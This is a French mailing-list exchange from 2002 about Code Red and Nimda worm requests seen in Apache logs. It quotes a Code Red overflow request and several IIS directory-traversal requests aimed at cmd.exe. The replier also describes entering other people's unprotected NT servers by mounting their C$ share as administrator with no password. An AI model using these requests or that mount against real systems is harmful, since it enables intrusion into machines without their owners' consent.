Salut c'est un attaque de CodeRed mais c'est contre les serveur IIS de chez Microsoft que �a peut �ventuellement fonctionner j'ai est plein les log depuis aout 2001 et on peut pas faire grand chose. Du m�me genre y a aussi : GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir ou encore GET /c/winnt/system32/cmd.exe?/c+dir ou encore GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" et encore GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 300 "-" "-" et aussi GET/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
enfin bon voil� un �chantillon de truc que tu peut avoir dans tes log et qui sont des attaques des vers CodeRed 1 et 2,Nimda et autre contre des serveur IIS Microsoft. Pour ma part je suis en adsl chez wanadoo et je re�ois environ une attaque de ce genre toute les 2 secondes pendant 20 secondes et �a recommence environ une heure plus tard toutes les 2 secondes pendant 20 seconde etc ... puis �a change d'ip et �'est reparti. Plusieurs fois j'ai contact� wanadoo sans r�ponses Puis j'ai scann� les ip qui "m'attaquais" souvant j'ai pu entrer sur des serveur NT ou tous etait grand ouvert il suffisais de faire un mount -t smbfs \\nomduserveur\C$ avec administrateur comme nom d'utilsateur et pas de mot de passe !!!! dans ces cas je laissais un message pour les pr�venir et puis a force �a ma saoul� et maintenant le regarde juste mes log grossir ;o(( ......... voil� a+ Le mer 23/10/2002 � 22:49, Remi POISSONNIER a �crit : > Bonjour, > Mon serveur Apache re�oit des requ�tes du type : > 168.191.50.39 - - [15/Oct/2002:11:10:20 +0200] "GET /default.ida?NN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNN%u9090%u6858%ucbd3%u7801 > %u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3 > %u7801%u9090%u9090%u8190%u00c3%u0003%u8b00 > %u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 346 "-" "-" > > Il s'agit d'une tentavide d'attaque, qui en sait plus ... > (Il semblerait (d'apr�s 'nmap' que l'origine vienne de poste Linux, en ADSL). > D'avance merci > --------------------------------------------------- > R�mi POISSONNIER > 89 Laroche St Cydroine > mailto : [EMAIL PROTECTED] > Des applications Linux pour �tablissement scolaire : > Serveur d'intranet, Serveur Novell 3.11, Serveur NT 3.5/4.0 (en travaux ....) > : > http://www.chez.com/imer/index.htm > > Echelon is watching you ;-( > Hackers, Encryption, NSA > > ---- > > Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? > Rendez-vous sur "http://www.mandrakestore.com";
Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur "http://www.mandrakestore.com";
